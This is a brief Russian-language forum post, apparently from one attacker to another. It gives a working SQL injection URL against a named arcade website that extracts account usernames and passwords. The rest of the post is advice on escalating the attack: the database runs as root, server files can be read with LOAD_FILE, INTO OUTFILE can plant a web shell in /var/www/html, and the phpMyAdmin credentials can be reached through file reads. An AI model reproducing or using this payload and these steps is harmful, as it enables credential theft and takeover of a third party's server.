http://www.grovearcade.com/index.php?page=-6+UNION+SELECT+1,2,3,(SELECT+CONCAT_WS(0x3a,UserNa me,Password)+FROM+grovearcade.accounts+LIMIT+0,1), 5,6,7,8,9,10,11,12--
и заметь что там юзверь под которым крутится БД , root ...читаются файлы на серванте(Load_file ), попробуй еще INTO+OUTFILE может шелл зальешь если путь абсолютный узнаешь
путь /var/www/html
также есть phpmyadmin но с бейсик авторизацией, но так как файлы читаются..остается прочитать нужный файл....